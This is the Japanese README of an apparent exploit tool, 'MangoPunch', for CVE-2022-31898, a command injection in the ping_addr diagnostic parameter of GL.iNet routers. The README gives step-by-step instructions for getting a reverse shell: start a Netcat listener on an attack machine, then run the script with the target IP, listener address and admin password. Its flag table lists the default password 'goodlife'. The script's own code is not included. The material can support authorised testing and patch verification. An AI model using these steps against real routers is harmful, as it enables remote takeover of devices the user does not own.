
認証済みコマンドインジェクションツール (CVE-2022-31898) - HACKCONRD 2026.
__ __ _____ _
| \/ | | __ \ | |
| \ / | __ _ _ __ __ _ ___ | |__) | _ _ __ ___| |__
| |\/| |/ _` | '_ \ / _` |/ _ \| ___/ | | | '_ \ / __| '_ \
| | | | (_| | | | | (_| | (_) | | | |_| | | | | (__| | | |
|_| |_|\__,_|_| |_|\__, |\___/|_| \__,_|_| |_|\___|_| |_|
__/ |
|___/
このリポジトリには、GL.iNet MT300N-V2 (Mango) およびファームウェアバージョン 3.215 未満の他のモデルで発見された Remote Command Execution (RCE) 脆弱性の技術的なProof of Concept (PoC) が含まれています。
この欠陥は、診断APIの ping_addr パラメータに存在し、認証された攻撃者がシェルメタ文字 (;) を介して任意のシステムコマンドを実行することを可能にします。
攻撃マシン (Kali Linux) でターミナルを開き、Netcat リスナーを起動します:
nc -lvnp 9292
以下のコマンドを使用してリバースシェルを起動します:
python3 mangopunch.py -R <TARGET_IP> -L <YOUR_IP> -l <YOUR_LISTERNER_PORT> -p <PASSWORD>
免責事項: このツールは教育および許可されたセキュリティテスト目的のみに使用されます。作者は誤用について一切の責任を負いません。 MangoPunch: CVE-2022-31898
| Flag | Full Name | 説明 | デフォルト |
|---|
-R | --rhost | リモートターゲットIP (ルーター) | 必須 |
-P | --rport | Web管理ポート | 443 |
-L | --lhost | リスナーIP (Kali/攻撃マシン) | 必須 |
-l | --lport | リスナーポート | 必須 |
-p | --pwd | 管理者パスワード | goodlife |
-t | --https | HTTPSを有効にする | False |